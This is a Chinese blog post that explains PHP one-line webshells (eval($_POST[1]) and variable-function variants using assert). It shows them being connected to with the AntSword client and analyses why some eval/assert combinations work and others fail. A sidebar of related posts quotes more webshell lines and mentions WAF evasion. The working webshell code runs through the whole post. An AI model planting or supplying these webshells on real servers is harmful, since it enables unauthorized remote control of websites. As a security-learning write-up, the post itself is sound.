eval与assert执行一句话木马

已于 2022-07-29 01:18:01 修改
阅读量2.2k 收藏 7
点赞数 3
分类专栏: 木马 文章标签: php
于 2022-07-24 00:04:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C_LCH_2000/article/details/125949698
版权

首先介绍一下木马中最简单的存在,俗称一句话木马

<?php
eval($_POST[1]);
?>

eval()

eval(str)是把str字符串按照php代码来计算或执行

该str字符串必须是合法的PHP代码,且必须以分号结尾

assert()

assert()包含于头文件assert()中,主要有assert()宏组成,

它接受一个int表达式作为其参数,若表达式求值的结果为真(1),则继续程序的执行;若为假(0),则assert()宏就在标准错误流(stderr)中写入一条错误信息,并同时调用abort()函数来终止程序。

assert()函数的主要功能是用于辅助调试程序。

一、木马测试

1.1  eval()

首先构造如下木马,用蚁剑测试连接

 

连接并可成功修改文件(插入 i love you)

二、升级木马并进行测试

2.1  eval()测试

<?php
$_POST[1]($_POST[2]);
?>

测试 1=eval() 构造 eval($_POST[2])

结果是无法连接,下面分析原因

因为eval是一个语言构造器而不是一个函数,不能被 可变函数 调用PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。

可变函数可以用来实现包括回调函数,函数表在内的一些用途。 可变函数不能用于例如 echo,print,unset(),isset(),empty(),include,require 以及类似的语言结构。需要使用自己的包装函数来将这些结构用作可变函数。

这么看来eval其实并不能算是‘函数’,而是PHP自身的语言结构,如果需要用‘可变’的方式调用,需要自己构造,类似这样子的:

<?php
function eval_1($str)
{
   eval($str);
} 
$a='eval_1';
$a('phpinfo()');
?>

2.2   assert()测试

<?php
$_POST[1]($_POST[2]);
?>

a.   测试 1=assert

 

连接失败!再做其他测试

b.   再选择base64尝试连接,则连接成功!!

c.   测试 1=assert    2=$_POST[3]   base64   连接密码:3

 为什么看似正常的操作,却有的成功连接,有的又失败呢?这是为撒子?

不要慌,看我们接下俩分析:

对于实验 c ,我们利用burpsuit进行抓包并分析,可以看出明显的问题:

 首先注意:

我们要清楚——eval函数中参数是字符,assert函数中参数为表达式 (或者为函数)

这里我们 1 提交的是assert ,2提交的$_POST[3],我们本意是为了执行assert($_POST[3])

而蚁剑同时也post 了 '3' 这个数据变成 %40ini_set 之类的东西,导致assert中又变成了字符串,所以连接失败。

再用butpsuit对未选择base64的实验 b 抓包,可见assert后面的是字符串,因此连接失败!

 而当执行base64时,连接成功,是因为是在执行中多了个 eval() 函数,因此我们实际上是再执行assert(eval()),eval()中参数是字符串,因此连接成功!

assert('xxxx') 里面只有字符串

assert(eval(base64xxxx)); 里面有eval函数

三、 eval()与assert()结合测试

 

 测试链接成功!!

我们抓包查看 ,则能明显发现原因:

我们1提交assert,2提交eval($_POST[3]),构造执行了 assert(eval($_POST[3]))

同时满足assert中参数为函数,eval中参数为字符串。因此执行成功!

总结

最后在强调重点:

eval函数中参数是字符,如:
eval('xxxx');
assert函数中参数为表达式 (或者为函数),如:
assert(phpinfo()) 

树迷了路
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
百彦子烨的博客
11-10 2万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
php eval $ post,网站多了几个PHP文件,eval($_POST['1']);
weixin_39805883的博客
03-11 750
网站多了几个PHP,内容如下:eval($_POST['1']);有的是其他内容, 我百度了一下发现时执行某些命令的,我测试了一下 如果权限没限制好的话 确实可以执行一些命令。 请问 除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?还有个PHP文件内容如下:还有文件,名字是:13686921256303.virus_killed内容是:请各位出出注意,谢谢了。回复内容:网站多了几个PHP...
webshell基本原理和使用(一句话木马实践)
最新发布
m0_65853019的博客
06-09 1337
webshell的基本原理和使用
Web安全-一句话木马
liuwei0376的专栏
08-20 4048
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
一句话过WAF
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-07 1853
一.绕过方式 木马存在敏感字符被拦截 木马代码存在敏感字符,直接被waf。如:如直接传&lt;?php @@eval($_POST['123']); ?&gt;,由于存在eval危险函数直接被拦截。 这时候需要对被waf的危险字符进行各种变形即可 收集的过狗马,最大同性交友网站github也有很多webshell项目 $poc = "a#s#s#e#r#t"; $poc_1 = e......
浅谈evalassert一句话木马执行区别
m0_46467017的博客
07-23 1394
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的木马的函数执行了我们发送的命令。
asp一句话.zip
06-28
当恶意用户访问这个页面时,服务器会执行木马中的代码,从而实现对服务器的控制。 3. ASP后门的常见形式: - `Response.Write Execute(Request("cmd"))`:这是一个典型的一句话木马,它接收GET或POST请求中的"cmd...
Eval一句话asp连接
11-10
在这里,"Eval一句话asp连接"可能指的是使用`Eval`函数来实现ASP页面与数据库或其他服务的快速连接。 ASP是微软开发的一种服务器端脚本语言,常用于构建动态网站。`Eval`函数在ASP中扮演的角色是将字符串转换为可...
一句话的艺术-web提权.pdf
01-25
一句话的艺术-web提权】是关于网络安全中的一种高级技巧,主要涉及如何在Web环境中,即使在存在各种安全防护措施的情况下,依然能够通过“一句话木马执行任意代码。这篇文章主要探讨了如何在Web应用程序中绕过...
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
本文将深入探讨PHP隐形一句话后门及其与ThinkPHP框架加密码程序的关系,特别是涉及的`base64_decode`函数的危险性。隐形一句话后门是黑客植入Web应用中的隐蔽代码,通常用于远程控制和恶意活动。这种后门很难被检测...
BUUCTF-[极客大挑战 2019]Upload1
Monica的博客
09-14 1891
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
php eval 黑客利用,eval一句话木马详细讲解
weixin_29184075的博客
03-28 2422
来解释下它的原理.首先是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval一句话木马的精华部分,使用 eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代 码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部...
记录一道文件上传题目
Altering_Ji的博客
05-08 268
CTF文件上传类题目,上传的文件中的内容也会被过滤,可以用双写和短标签绕过
eval一句话的简单理解
这周末在做梦的博客
05-06 950
eval类型的一句话的见解一,$_POST1概述2常见格式3使用方式二,$_GET1概述2常见格式3使用方法4举例一级目录二级目录三级目录 一,$_POST 1概述 POST是一种取数据的方式。请求开始后,浏览器要向服务器额外发送一些数据,例如cookie、用户名、密码等等,这些数据不体现在URL上,发送完毕后服务器再将数据(网页)传送给浏览器。 (下述为个人理解) 通过该方法传递,简单来说就是用传递的参数构建连接,一旦主动调用后,参数将传递至服务器,且服务器响应200,就建立了TCP/UDP连接,可以通
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
一句话木马@eval($_POST[“cmd“]);是什么意思(超详细)
qq_62708558的博客
02-20 2万+
再加上eval()方法函数将用户输入的字符串进行执行,那么用户便可以通过输入php语句来达到任意操作数据库和服务器的效果了
你真的了解一句话木马吗?
Elite的博客
04-14 1万+
一句话木马是大多网安人在初步学习中,遇到的一种简单的木马文件,但是你真的了解它吗?
eval一句话木马
12-09
根据提供的引用内容,可以得知`eval`在一句话木马中被广泛使用。一句话木马是一种恶意代码,通常是一行代码,可以在未经授权的情况下远程访问受感染的计算机并执行恶意操作。攻击者通常使用`eval`函数来执行一句话木马中的代码。攻击者可以将恶意代码嵌入到受害者的网站或应用程序中,以获取对受害者系统的完全控制。因此,`eval`在一句话木马中扮演着非常重要的角色。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值